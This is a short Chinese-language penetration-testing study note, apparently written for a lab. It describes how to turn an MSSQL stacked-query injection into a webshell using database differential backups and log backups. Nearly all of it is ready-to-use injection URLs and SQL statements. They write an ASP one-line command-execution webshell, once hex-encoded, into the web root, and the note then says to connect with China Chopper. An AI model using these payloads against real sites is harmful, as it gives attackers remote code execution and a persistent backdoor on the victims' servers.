大哥带的mssql注入拿shell

任务二 注入点拿shell

路径的爆破

https://blog.csdn.net/edu_aqniu/article/details/78409451

0X01判断 是否为判断当前数据库用户名是否为DB_OWNER：

是

 

 

Mssql拿shell有两种方法 win2008sever里面

0X02数据库备份拿shell

0X001 创建自己的数据库

http://www.aspx-sqli.com/index.asp?id=1;create%20database%20zhong;

 

 

 

0X002先进行一次完整备份：

?id=1;backup database zhong to disk = 'E:\wwwroot\asp_sqli';

 

 

0X003使用数据库：

http://www.aspx-sqli.com/index.asp?id=1;use%20zhong;

 

 

0x004创建新表：在数据库名为中的库里面创建一个新的cmd表

create table [dbo].[zhong] ([cmd] [image]);

 

 

0X006向cmd表中插入数据

?id=1;insert into zhong(cmd) values(0x3C25657865637574652872657175657374282276616C7565222929253E);

 

 

 

0X007进行数据库的差异备份

?id=1;backup database zhong to disk='E:\wwwroot\asp_sqli\zhongqzi.asp' WITH DIFFERENTIAL,FORMAT;

 

 

然后菜刀连接

 

 

0X03log备份拿shell

0X001 激活为还原模式

这里要注意的是我们通过备份拿shell 要注意是需要进行数据库的

LOG备份需要先把指定的数据库激活为还原模式，所以需要执行alter database XXX set RECOVERY FUL，而差异备份不需要，所以只有这条语句的就是LOG备份

?id=1;alter database asp_test set RECOVERY FULL –

 

 

0X002创建新的表cmd

?id=1;create table cmd (a image) –

 

 

0X003备份当前库的log到网站根目录

?id=1;backup log asp_test to disk = 'E:\wwwroot\asp_sqli\zhong.asp' with init –

 

 

0X004在cmd表的a列中插入一句话

 

insert into cmd (a) values ('<%%25Execute(request("go"))%
%25>')--

 

0X005备份差异log

;backup log asp_test to disk = 'E:\wwwroot\asp_sqli\zhongqi.asp' --

 

 

 

0x006 菜刀连接

 ----致谢 卿哥

https://www.cnblogs.com/-qing-/p/10364190.html

带我们一点一点了解渗透

学习之路 少就是多 慢就是快